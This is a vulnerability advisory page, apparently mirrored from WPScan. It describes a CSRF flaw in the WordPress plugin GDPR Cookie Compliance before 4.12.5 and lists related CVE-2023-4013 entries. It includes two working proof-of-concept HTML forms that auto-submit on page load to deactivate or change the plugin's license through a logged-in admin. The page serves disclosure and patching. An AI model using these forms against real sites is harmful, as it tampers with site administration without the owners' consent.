Lucene search
Erwan LR (WPScan)WPEX-ID:54E4494C-A280-4D91-803D-7D55159CDBC5HistoryAug 07, 2023 - 12:00 a.m.
GDPR Cookie Compliance < 4.12.5 - License Update/Deactivation via CSRF
2023-08-0700:00:00
Erwan LR (WPScan)
24
gdpr
cookie compliance
license update
deactivation
csrf
admin
exploit
Description The plugin does not have proper CSRF checks when managing its license, which could allow attackers to make logged in admins update and deactivate the plugin’s license via CSRF attacks
Make a logged in admin open a page with the code below
To make them deactivate the license
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=moove-gdpr_licence&tab=licence" method="POST">
<input type="text" name="gdpr_deactivate_license" value="1">
<input type="submit" value="submit">
</form>
</body>
To make them update the license (requires a valid license)
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=moove-gdpr_licence&tab=licence" method="POST">
<input type="text" name="moove_gdpr_license_key" value="valid-license">
<input type="text" name="gdpr_activate_license" value="1">
<input type="submit" value="submit">
</form>
</body>Related
prion
prion
Cross site request forgery (csrf)
2023-08-30 15:15:00
cve
cve
CVE-2023-4013
2023-08-30 15:15:09
cvelist
cvelist
nvd
nvd
CVE-2023-4013
2023-08-30 15:15:09
wpvulndb
wpvulndb
GDPR Cookie Compliance < 4.12.5 - License Update/Deactivation via CSRF
2023-08-07 00:00:00
openvas
openvas
WordPress GDPR Cookie Compliance Plugin < 4.12.5 CSRF Vulnerability
2023-08-31 00:00:00
wordfence
wordfence
7.3 High
AI Score
Confidence
Low
0.0005 Low
EPSS
Percentile
17.8%
Related for WPEX-ID:54E4494C-A280-4D91-803D-7D55159CDBC5